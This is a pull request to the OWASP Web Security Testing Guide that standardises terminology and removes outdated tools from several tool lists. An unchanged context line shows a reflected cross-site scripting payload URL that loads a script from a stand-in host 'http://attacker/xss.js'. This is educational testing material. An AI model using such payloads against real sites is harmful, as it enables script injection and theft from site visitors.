### PR TITLE
 Terminology Consistency & Various Tweaks

### DIFF
--- a/document/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.md
+++ b/document/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.md
@@ -173,8 +173,8 @@ As stated earlier, web server fingerprinting is often included as a functionalit
 Here are some commonly-used scan tools that include web server fingerprinting functionality.
 
 - [Netcraft](https://toolbar.netcraft.com/site_report), an online tool that scans websites for information, including the web server.
-- [Nikto](https://github.com/sullo/nikto), an open source command line scanning tool.
-- [Nmap](https://nmap.org/), an open source command line tool that also has a GUI, [Zenmap](https://nmap.org/zenmap/).
+- [Nikto](https://github.com/sullo/nikto), an Open Source command line scanning tool.
+- [Nmap](https://nmap.org/), an Open Source command line tool that also has a GUI, [Zenmap](https://nmap.org/zenmap/).
 
 ## Remediation
 

--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.md
@@ -6,7 +6,7 @@
 
 ## Summary
 
-Nowadays web applications often make use of popular open source or commercial software that can be installed on servers with minimal configuration or customization by the server administrator. Moreover, a lot of hardware appliances (i.e. network routers and database servers) offer web-based configuration or administrative interfaces.
+Nowadays web applications often make use of popular Open Source or commercial software that can be installed on servers with minimal configuration or customization by the server administrator. Moreover, a lot of hardware appliances (i.e. network routers and database servers) offer web-based configuration or administrative interfaces.
 
 Often these applications, once installed, are not properly configured and the default credentials provided for initial authentication and configuration are never changed. These default credentials are well known by penetration testers and, unfortunately, also by malicious attackers, who can use them to gain access to various types of applications.
 

--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md
@@ -158,7 +158,7 @@ which is a common attack. But, in this case, it is possible to bypass the saniti
 
 `http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>`
 
-This will exploit the reflected cross site scripting vulnerability shown before, executing the javascript code stored on the attacker's web server as if it was originating from the victim web site, `http://example/`.
+This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim web site, `http://example/`.
 
 #### Example 7: HTTP Parameter Pollution (HPP)
 

--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
@@ -556,12 +556,9 @@ For generic input validation security, refer to the [Input Validation CheatSheet
 ## Tools
 
 - [SQL Injection Fuzz Strings (from wfuzz tool) - Fuzzdb](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection)
-- [Francois Larouche: Multiple DBMS SQL Injection tool -SQL Power Injector](http://www.sqlpowerinjector.com/index.htm)
 - [sqlbftools](http://packetstormsecurity.org/files/43795/sqlbftools-1.2.tar.gz.html)
 - [Bernardo Damele A. G.: sqlmap, automatic SQL injection tool](http://sqlmap.org/)
-- [icesurfer: SQL Server Takeover Tool - sqlninja](http://sqlninja.sourceforge.net)
 - [Muhaimin Dzulfakar: MySqloit, MySql Injection takeover tool](https://github.com/dtrip/mysqloit)
-- [bsqlbf, a blind SQL injection tool in Perl](https://code.google.com/p/bsqlbf-v2/)
 
 ## References
 

--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
@@ -70,7 +70,7 @@ varchar value 'test' to a column of data type int.
 /target/target.asp, line 113
 ```
 
-Monitor all the responses from the web server and have a look at the HTML/javascript source code. Sometimes the error is present inside them but for some reason (e.g. javascript error, HTML comments, etc) is not presented to the user. A full error message, like those in the examples, provides a wealth of information to the tester in order to mount a successful injection attack. However, applications often do not provide so much detail: a simple '500 Server Error' or a custom error page might be issued, meaning that we need to use blind injection techniques. In any case, it is very important to test each field separately: only one variable must vary while all the other remain constant, in order to precisely understand which parameters are vulnerable and which are not.
+Monitor all the responses from the web server and have a look at the HTML/JavaScript source code. Sometimes the error is present inside them but for some reason (e.g. javascript error, HTML comments, etc) is not presented to the user. A full error message, like those in the examples, provides a wealth of information to the tester in order to mount a successful injection attack. However, applications often do not provide so much detail: a simple '500 Server Error' or a custom error page might be issued, meaning that we need to use blind injection techniques. In any case, it is very important to test each field separately: only one variable must vary while all the other remain constant, in order to precisely understand which parameters are vulnerable and which are not.
 
 ### Standard SQL Injection Testing
 

--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md
@@ -336,7 +336,6 @@ If this request returns books by Charles Dickens, you've confirmed the presence 
 
 ## Tools
 
-- [SQLInjector](https://github.com/p4pentest/SQLInjector)
 - [Orascan (Oracle Web Application VA scanner), NGS SQuirreL (Oracle RDBMS VA Scanner)](https://www.nccgroup.trust/globalassets/service-pages/documents/security-consulting/information-security-software/ncc-squirrel-suite.pdf)
 
 ## References

--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md
@@ -296,8 +296,6 @@ Remember that OPENROWSET is accessible to all users on SQL Server 2000 but it is
 
 ## Tools
 
-- [Francois Larouche: Multiple DBMS SQL Injection tool - SQL Power Injector](http://www.sqlpowerinjector.com/index.htm)
-- [icesurfer: SQL Server Takeover Tool - sqlninja](http://sqlninja.sourceforge.net)
 - [Bernardo Damele A. G.: sqlmap, automatic SQL injection tool](https://sqlmap.org/)
 
 ## References

--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13.1-Testing_for_Heap_Overflow.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13.1-Testing_for_Heap_Overflow.md
@@ -76,7 +76,6 @@ Static code analysis tools can also help in locating heap related vulnerabilitie
 
 - [OllyDbg: “A windows based debugger used for analyzing buffer overflow vulnerabilities”](http://www.ollydbg.de)
 - [Spike, A fuzzer framework that can be used to explore vulnerabilities and perform length testing](https://www.immunitysec.com/downloads/SPIKE2.9.tgz)
-- [Brute Force Binary Tester (BFB), A proactive binary checker](http://bfbtester.sourceforge.net)
 - [Metasploit, A rapid exploit development and Testing frame work](https://www.metasploit.com)
 
 ## References

--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13.2-Testing_for_Stack_Overflow.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13.2-Testing_for_Stack_Overflow.md
@@ -112,7 +112,6 @@ Apart from manually reviewing code for stack overflows, static code analysis too
 
 - [OllyDbg: “A windows based debugger used for analyzing buffer overflow vulnerabilities”](http://www.ollydbg.de)
 - [Spike, A fuzzer framework that can be used to explore vulnerabilities and perform length testing](https://www.immunitysec.com/downloads/SPIKE2.9.tgz)
-- [Brute Force Binary Tester (BFB), A proactive binary checker](http://bfbtester.sourceforge.net/)
 - [Metasploit, A rapid exploit development and Testing frame work](https://www.metasploit.com)
 
 ## References

--- a/document/6-Appendix/A-Testing_Tools_Resource.md
+++ b/document/6-Appendix/A-Testing_Tools_Resource.md
@@ -104,7 +104,7 @@
 - [ParrotSecurity](https://www.parrotsec.org/)
 - [Kali](https://www.kali.org/)
 - [BlackArch](https://blackarch.org/downloads.html)
-- [PenToo](https://www.pentoo.ch/download/)
+- [PenToo](https://www.pentoo.ch/)
 
 ## Source Code Analyzers
 

--- a/document/6-Appendix/A-Testing_Tools_Resource.md
+++ b/document/6-Appendix/A-Testing_Tools_Resource.md
@@ -7,35 +7,22 @@
   - ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
 - [Burp Proxy](https://www.portswigger.net/Burp/)
   - Burp Proxy is an intercepting proxy server for security testing of web applications it allows Intercepting and modifying all HTTP(S) traffic passing in both directions, it can work with custom SSL certificates and non-proxy-aware clients.
-- [Webstretch Proxy](https://sourceforge.net/projects/webstretch)
-  - Webstretch Proxy enable users to view and alter all aspects of communications with a web site via a proxy. It can also be used for debugging during development.
 - [Firefox HTTP Header Live](https://addons.mozilla.org/en-US/firefox/addon/http-header-live)
   - View HTTP headers of a page and while browsing.
 - [Firefox Tamper Data](https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-ff-quantum/)
   - Use tamperdata to view and modify HTTP/HTTPS headers and post parameters
 - [Firefox Web Developer Tools](https://addons.mozilla.org/en-US/firefox/addon/web-developer/)
   - The Web Developer extension adds various web developer tools to the browser.
-- [DOM Inspector](https://developer.mozilla.org/en/docs/DOM_Inspector)
-  - DOM Inspector is a developer tool used to inspect, browse, and edit the Document Object Model (DOM)
-- [Grendel-Scan](https://sourceforge.net/projects/grendel/)
-  - Grendel-Scan is an automated security scanning of web applications and also supports manual penetration testing.
-  - SWFIntruder (pronounced Swiff Intruder) is the first tool specifically developed for analyzing and testing security of Flash applications at runtime.
 - [w3af](https://w3af.org)
   - w3af is a Web Application Attack and Audit Framework. The project’s goal is finding and exploiting web application vulnerabilities.
-- [skipfish](https://code.google.com/p/skipfish/)
-  - Skipfish is an active web application security reconnaissance tool.
 - [Web Developer toolbar](https://chrome.google.com/webstore/detail/bfbameneiokkgbdmiekhjnmfkcnldhhm)
   - The Web Developer extension adds a toolbar button to the browser with various web developer tools. This is the official port of the Web Developer extension for Firefox.
 - [HTTP Request Maker](https://chrome.google.com/webstore/detail/kajfghlhfkcocafkcjlajldicbikpgnp?hl=en-US)
   - Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages, tamper with the URL, headers and POST data and, of course, make new requests
 - [Cookie Editor](https://chrome.google.com/webstore/detail/fngmhnnpilhplaeedifhccceomclgfbg?hl=en-US)
   - Edit This Cookie is a cookie manager. You can add, delete, edit, search, protect and block cookies
-- [Cookie swap](https://chrome.google.com/webstore/detail/dffhipnliikkblkhpjapbecpmoilcama?hl=en-US)
-  - Swap My Cookies is a session manager, it manages cookies, letting you login on any website with several different accounts.
 - [Session Manager](https://chrome.google.com/webstore/detail/session-manager/mghenlmbmjcpehccoangkdpagbcbkdpc)
   - With Session Manager you can quickly save your current browser state and reload it whenever necessary. You can manage multiple sessions, rename or remove them from the session library. Each session remembers the state of the browser at its creation time, i.e the opened tabs and windows.
-- [Subgraph Vega](https://subgraph.com/vega/)
-  - Vega is a free and Open Source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
 
 ### Testing for Specific Vulnerabilities
 
@@ -45,13 +32,7 @@
 
 #### Testing for SQL Injection
 
-- [Sqlninja: a SQL Server Injection & Takeover Tool](https://sourceforge.net/projects/sqlninja/)
 - [Bernardo Damele A. G.: sqlmap, automatic SQL injection tool](http://sqlmap.org/)
-- [Absinthe 1.1 (formerly SQLSqueal)](https://sourceforge.net/projects/absinthe/)
-- [SQLInjector - Uses inference techniques to extract data and determine the backend database server](https://github.com/p4pentest/SQLInjector)
-- [Bsqlbf-v2: A perl script allows extraction of data from Blind SQL Injections](https://code.google.com/p/bsqlbf-v2/)
-- [Pangolin: An automatic SQL injection penetration testing tool](https://www.darknet.org.uk/2009/05/pangolin-automatic-sql-injection-tool/)
-- [Multiple DBMS Sql Injection tool - SQL Power Injector](http://www.sqlpowerinjector.com/)
 
 #### Testing Oracle
 
@@ -73,7 +54,6 @@
 - [Medusa](https://github.com/jmk-foofus/medusa)
 - [Ncat](https://nmap.org/ncat/)
 - [HashCat](https://hashcat.net/hashcat/#features-algos)
-- [fgdump](http://foofus.net/goons/fizzgig/fgdump/)
 - [Password Dictionary](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
 
 #### Testing Buffer Overflow
@@ -104,7 +84,7 @@
 ## Commercial Black-Box Testing Tools
 
 - [NGS Typhon](https://www.nccgroup.trust/uk/our-services/cyber-security/technology-solutions/)
-- [IBM AppScan](https://www.ibm.com/hk-en/security/application-security/appscan)
+- [HCL AppScan](https://www.hcltechsw.com/products/appscan)
 - [Burp Intruder](https://portswigger.net/burp)
 - [Acunetix Web Vulnerability Scanner](https://www.acunetix.com)
 - [MaxPatrol Security Scanner](https://www.ptsecurity.com/ww-en/products/maxpatrol/)
@@ -119,11 +99,10 @@
 ### Linux Distrubtion
 
 - [PenTestBox](https://pentestbox.org/)
-- [Samurai](https://sourceforge.net/p/samurai/wiki/Home/)
+- [Samurai](https://github.com/SamuraiWTF/samuraiwtf)
 - [Santoku](https://sourceforge.net/projects/santoku/)
 - [ParrotSecurity](https://www.parrotsec.org/)
 - [Kali](https://www.kali.org/)
-- [Matriux](https://sourceforge.net/projects/matriux/?source=navbar)
 - [BlackArch](https://blackarch.org/downloads.html)
 - [PenToo](https://www.pentoo.ch/download/)
 
@@ -137,8 +116,6 @@
 - [phpcs-security-audit](https://github.com/squizlabs/PHP_CodeSniffer)
 - [PMD](https://pmd.github.io/)
 - [Microsoft’s FxCop](https://docs.microsoft.com/en-us/visualstudio/code-quality/install-fxcop-analyzers?view=vs-2019)
-- [Oedipus](https://www.darknet.org.uk/2006/06/oedipus-open-source-web-application-security-analysis/)
-- [Splint](https://splint.org/)
 - [SonarQube](https://www.sonarqube.org/)
 - [W3af](https://w3af.org/)
 
@@ -164,21 +141,13 @@ Acceptance testing tools are used to validate the functionality of web applicati
 - [HtmlUnit](http://htmlunit.sourceforge.net)
   - A Java and JUnit based framework that uses the Apache HttpClient as the transport.
   - Very robust and configurable and is used as the engine for a number of other testing tools.
-- [jWebUnit](https://jwebunit.github.io/jwebunit/)
-  - A Java based meta-framework that uses htmlunit or selenium as the testing engine.
-- [HttpUnit](http://httpunit.sourceforge.net)
-  - One of the first web testing frameworks, suffers from using the native JDK provided HTTP transport, which can be a bit limiting for security testing.
-- [Solex](http://solex.sourceforge.net)
-  - An Eclipse plugin that provides a graphical tool to record HTTP sessions and make assertions based on the results.
 - [Selenium](https://www.seleniumhq.org/)
   - JavaScript based testing framework, cross-platform and provides a GUI for creating tests.
-  - Mature and popular tool, but the use of JavaScript could hamper certain security tests.
 
 ## Other Tools
 
 ### Binary Analysis
 
-- [BugScam IDC Package](https://sourceforge.net/projects/bugscam/)
 - [Veracode](https://www.veracode.com)
 
 ### Site Mirroring
@@ -186,4 +155,3 @@ Acceptance testing tools are used to validate the functionality of web applicati
 - [wget](https://www.gnu.org/software/wget/)
 - [Wget for windows](http://gnuwin32.sourceforge.net/packages/wget.htm)
 - [curl](https://curl.haxx.se/)
-- [Xenu's Link Sleuth](http://home.snafu.de/tilman/xenulink.html)

--- a/document/6-Appendix/A-Testing_Tools_Resource.md
+++ b/document/6-Appendix/A-Testing_Tools_Resource.md
@@ -35,7 +35,7 @@
 - [Session Manager](https://chrome.google.com/webstore/detail/session-manager/mghenlmbmjcpehccoangkdpagbcbkdpc)
   - With Session Manager you can quickly save your current browser state and reload it whenever necessary. You can manage multiple sessions, rename or remove them from the session library. Each session remembers the state of the browser at its creation time, i.e the opened tabs and windows.
 - [Subgraph Vega](https://subgraph.com/vega/)
-  - Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
+  - Vega is a free and Open Source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
 
 ### Testing for Specific Vulnerabilities
 


### PR DESCRIPTION
This PR closes OWASP/wstg#451.

Terminology:
* JavaScript
* Open Source

Tools:
* Vega - Hasn't had a commit since 2016.
* WebStretch Proxy - Hasn't been updated since 2013.
* DOM Inspector - Is no longer available via the AMO link on the linked page.
* Grendel Scan - Hasn't been updated since 2016.
* SWFIntruder - Removed from Appendix, left is Flash specific section.
* SkipFish - Hasn't been updated since before GoogleCode went away.
* Cookie Swap - Hasn't been updated since 2013.
* SQLninja - Hasn't been updated since 2014.
* Absinthe - Hasn't been updated since 2013, maybe even earlier.
* SQLInjector - Hasn't been updated since 2016.
* Bsqlbf - Hasn't been updated since before GoogleCode went away.
* Pangolin - The last release news I could find was 2010.
* SQL Power Injector - Hasn't been updated since 2014.
* fgdump - Hasn't been updated since 2008.
* Brute Force Binary Tester (BFB) - Hasn't been updated since 2013.
* IBM AppScan - HCL AppScan (it changed hands last year or the year before).
* Matriux - Hasn't been updated since 2014.
* Oedipus - Latest info I could find was 2010.
* Splint - Hasn't been updated since 2010.
* jWebUnit - No update since 2015.
* HttpUnit - No update since 2008.
* Solex - The linked page talks about working with a version of Eclipse from 2003.
* BugScam IDC Package - Hasn't been updated since 2013.
* Xenu's Link Sleuth - Hasn't been updated since 2010.